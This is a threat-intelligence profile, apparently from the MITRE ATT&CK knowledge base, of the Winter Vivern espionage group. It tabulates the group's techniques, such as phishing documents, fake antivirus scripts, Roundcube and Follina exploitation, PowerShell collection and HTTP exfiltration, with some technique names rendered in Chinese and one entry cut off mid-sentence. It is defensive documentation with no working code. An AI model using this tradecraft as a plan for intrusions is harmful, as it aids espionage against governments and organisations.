Winter Vivern
Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control.[1][2][3][4][5]
Associated Group Descriptions
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1595 | .002 | 主动扫描: Vulnerability Scanning |
Winter Vivern has used remotely-hosted instances of the Acunetix vulnerability scanner.[2] |
| Enterprise | T1036 | 伪装 |
Winter Vivern created specially-crafted documents mimicking legitimate government or similar documents during phishing campaigns.[2] |
|
| .004 | Masquerade Task or Service |
Winter Vivern has distributed malicious scripts and executables mimicking virus scanners.[2] |
||
| Enterprise | T1190 | 利用公开应用程序漏洞 |
Winter Vivern has exploited known and zero-day vulnerabilities in software usch as Roundcube Webmail servers and the "Follina" vulnerability.[4][5] |
|
| Enterprise | T1140 | 反混淆/解码文件或信息 |
Winter Vivern delivered exploit payloads via base64-encoded payloads in malicious email messages.[4] |
|
| Enterprise | T1059 | 命令与脚本解释器 |
Winter Vivern used XLM 4.0 macros for initial code execution for malicious document files.[1] |
|
| .001 | PowerShell |
Winter Vivern passed execution from document macros to PowerShell scripts during initial access operations.[1] Winter Vivern used batch scripts that called PowerShell commands as part of initial access and installation operations.[3] |
||
| .003 | Windows Command Shell |
Winter Vivern distributed Windows batch scripts disguised as virus scanners to prompt download of malicious payloads using built-in system tools.[2][3] |
||
| .007 | JavaScript |
Winter Vivern delivered malicious JavaScript to exploit targets when exploiting Roundcube Webmail servers.[4] |
||
| Enterprise | T1584 | .006 | 基础设施妥协: Web Services |
Winter Vivern has used compromised WordPress sites to host malicious payloads for download.[2] |
| Enterprise | T1113 | 屏幕捕获 |
Winter Vivern delivered PowerShell scripts capable of taking screenshots of victim machines.[3] |
|
| Enterprise | T1071 | .001 | 应用层协议: Web Protocols |
Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.[2][3] |
| Enterprise | T1083 | 文件和目录发现 |
Winter Vivern delivered malicious JavaScript payloads capable of listing folders and emails in exploited email servers.[4] |
|
| Enterprise | T1189 | 浏览器攻击 |
Winter Vivern created dedicated web pages mimicking legitimate government websites to deliver malicious fake anti-virus software.[3] |
|
| Enterprise | T1204 | .001 | 用户执行: Malicious Link |
Winter Vivern has mimicked legitimate government-related domains to deliver malicious webpages containing links to documents or other content for user execution.[2][3] |
| Enterprise | T1114 | .001 | 电子邮件收集: Local Email Collection |
Winter Vivern delivered malicious JavaScript payloads capable of exfiltrating email messages from exploited email servers.[4] |
| Enterprise | T1082 | 系统信息发现 |
Winter Vivern script execution includes basic victim information gathering steps which are then transmitted to command and control servers.[1] |
|
| Enterprise | T1033 | 系统所有者/用户发现 |
Winter Vivern PowerShell scripts execute |
|
| Enterprise | T1119 | 自动化收集 |
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.[3] |
|
| Enterprise | T1020 | 自动化渗出 |
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.[3] |
|
| Enterprise | T1583 | .001 | 获取基础设施: Domains |
Winter Vivern registered domains mimicking other entities throughout various campaigns.[1] |
| .003 | 获取基础设施: Virtual Private Server |
Winter Vivern used adversary-owned and -controlled servers to host web vulnerability scanning applications.[2] |
||
| Enterprise | T1105 | 输入工具传输 |
Winter Vivern executed PowerShell scripts to create scheduled tasks to retrieve remotely-hosted payloads.[1] |
|
| Enterprise | T1056 | .003 | 输入捕获: Web Portal Capture |
Winter Vivern registered and hosted domains to allow for creation of web pages mimicking legitimate government email logon sites to collect logon information.[2] |
| Enterprise | T1041 | 通过C2信道渗出 |
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.[3] |
|
| Enterprise | T1566 | .001 | 钓鱼: Spearphishing Attachment |
Winter Vivern leverages malicious attachments delivered via email for initial access activity.[1][2][3] |
| Enterprise | T1053 | .005 | 预定任务/作业: Scheduled Task |
Winter Vivern executed PowerShell scripts that would subsequently attempt to establish persistence by creating scheduled tasks objects to periodically retrieve and execute remotely-hosted payloads.[1] |
References
- Chad Anderson. (2021, April 27). Winter Vivern: A Look At Re-Crafted Government MalDocs Targeting Multiple Languages. Retrieved July 29, 2024.
- Tom Hegel. (2023, March 16). Winter Vivern | Uncovering a Wave of Global Espionage. Retrieved July 29, 2024.
- CERT-UA. (2023, February 1). UAC-0114 aka Winter Vivern to target Ukrainian and Polish GOV entities (CERT-UA#5909). Retrieved July 29, 2024.
- Matthieu Faou. (2023, October 25). Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers. Retrieved July 29, 2024.
- Michael Raggi & The Proofpoint Threat Research Team. (2023, March 30). Exploitation is a Dish Best Served Cold: Winter Vivern Uses Known Zimbra Vulnerability to Target Webmail Portals of NATO-Aligned Governments in Europe. Retrieved July 29, 2024.